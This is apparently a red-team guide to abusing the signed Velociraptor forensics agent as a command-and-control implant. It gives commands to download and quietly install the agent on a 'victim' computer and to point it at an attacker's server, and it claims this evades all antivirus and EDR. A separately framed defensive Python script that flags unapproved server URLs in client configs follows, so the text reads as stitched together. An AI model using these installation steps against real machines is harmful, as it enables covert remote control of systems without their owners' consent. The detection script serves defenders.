This needs to be run in a privileged shell.
Velociraptor is an advanced digital forensic and incident response tool that enhances your visibility into your endpoints. But it can also be used as a C2 server. It is a very convenient tool for this, because the agents are signed by Velociraptor, so the executable evades all antivirus and EDR solutions.
First things first, deploy the server: https://docs.velociraptor.app/docs/deployment/
Install the agent on the victim
First, download and install the official binary:
# download the latest version
wget https://github.com/Velocidex/velociraptor/releases/download/v0.6.7-5/velociraptor-v0.6.7-4-windows-amd64.msi -OutFile velociraptor.msi
# install quietly
msiexec.exe /quiet /i velociraptor.msi
Then, on the victim computer, edit C:\Program Files\Velociraptor\client.config.yaml and replace its contents with the client.config.yml previously downloaded from the Velociraptor server.
Note: if you don’t have a client.config.yml, you can generate one on the server with ./velociraptor --config ../etc/server.config.yaml config client > ../etc/client.config.yaml. Take a look at https://medium.com/@0D0AResearch/getting-started-with-velociraptor-2f20de22b491
Now you should see your new client on the Velociraptor dashboard!
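Seen from the defending side, the step that matters above is the replacement of client.config.yaml: the signed agent reports to whatever server that file names. The following added example (not code from this page or from the Velociraptor project) reads the Client.server_urls list out of a client config and reports every server that is not one of your own. The approved hostname and the sample config are constructed placeholders, and the reader handles only block-style YAML lists.

```python
import re
import sys
from urllib.parse import urlsplit

# Assumption: host:port of the frontends your own DFIR team runs (placeholder).
APPROVED_FRONTENDS = {"velociraptor.corp.example:8000"}

# Constructed sample of a client.config.yaml; values are placeholders.
SAMPLE = """\
Client:
  server_urls:
  - https://velociraptor.corp.example:8000/
  - https://203.0.113.10:8000/
  ca_certificate: |
    -----BEGIN CERTIFICATE-----
  nonce: constructed
"""

def server_urls(config_text):
    """Return the entries of Client.server_urls (block-style YAML only)."""
    urls, in_client, in_list = [], False, False
    for raw in config_text.splitlines():
        line = raw.split(" #", 1)[0].rstrip()   # drop trailing comments
        if not line.strip():
            continue
        if line[0] not in " \t":                # a new top-level section
            in_client, in_list = line.startswith("Client:"), False
        elif in_client:
            item = re.match(r"\s*-\s*(\S+)", line)
            if in_list and item:
                urls.append(item.group(1).strip("'\""))
            else:                               # any other key ends the list
                in_list = line.strip() == "server_urls:"
    return urls

def unapproved_frontends(config_text, approved=APPROVED_FRONTENDS):
    """Return the server URLs whose host:port is not an approved frontend."""
    flagged = []
    for url in server_urls(config_text):
        try:
            parts = urlsplit(url)
            endpoint = f"{(parts.hostname or '').lower()}:{parts.port or 443}"
        except ValueError:                      # malformed URL: report it
            endpoint = ""
        if endpoint not in approved:
            flagged.append(url)
    return flagged

if __name__ == "__main__":                      # usage: script.py <config>...
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8") as fh:
            for url in unapproved_frontends(fh.read()):
                print(f"{path}: unapproved Velociraptor server {url}")
```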